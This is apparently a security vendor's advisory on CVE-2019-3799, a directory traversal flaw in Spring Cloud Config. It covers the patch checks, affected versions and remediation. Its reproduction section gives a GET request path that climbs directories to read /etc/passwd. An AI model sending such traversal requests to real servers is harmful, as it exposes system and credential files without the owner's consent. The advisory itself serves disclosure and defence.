Alert: Spring Cloud Config Directory Traversal Vulnerability (CVE-2019-3799)

  • Source:SANGFOR Security Center
  • Date Published:2019-04-20


About  Spring

Spring is a layered Java/Java EE/.NET application framework. It is a layered open-source framework based on IOC and AOP architectures. It provides a modularized and elegant solution to use MVC as well as a unified API for various data access.  In addition, it makes easier to configure Bean since it adopts IOC, provides an easy-to-use AOP and implements Transaction Management and other functions.  It provides an easy development method that does not need a number of property files and helper classes which make the underlying code complex and confusing. It is widely used currently.  Spring Data is a module in Spring framework that provides access to underlying data and Spring Data Commons is a shared basic module.

Vulnerability Analysis

CVE-2019-3799 Technical Details: Attackers can exploit various ../ to perform directory traversal, access sensitive files in other directories on servers, because spring-cloud-config-server module does not impose security restrictions on inbound paths, causing sensitive information disclosure.

Official Patches:

图片1.png The latest official patches added isInvalidEncodedPath function to check inbound URL. If it contains %, URL decoding is conducted for the incoming URL,  which prevents attackers from bypassing detection against URL containing ../ by URL encoding.

图片2.png The newly added isInvalidPath detects keywords in URL. If a URL contains WEB-INF, META-INF, .., ../, warning will be triggered.

Vulnerability Reproduction

Download a vulnerable Spring Cloud Config from the following links:

After reproduction environment is ready, upload /test/pathtraversal/master/../../../../../etc/passwd by using GET method, and passwd file information will show in Linux, as shown below:

图片3.png Impacts

Globally, there are over 50,000 Spring-based servers are open to the Internet, among which over 28,000 are in China.

Affected Versions:

     Spring Cloud Config 2.1.0 to 2.1.1

     Spring Cloud Config 2.0.0 to 2.0.3

     Spring Cloud Config 1.4.0 to 1.4.5



Sangfor Solution

Sangfor Security Cloud has updated in the first place and gained the ability to probe websites for this vulnerability and ensure user security.

For Sangfor NGAF customers, simply update security capabilities and turn on the corresponding security protection feature.

Remediation Solution

Spring has released patch to fix the vulnerability. Download the patch from the following link: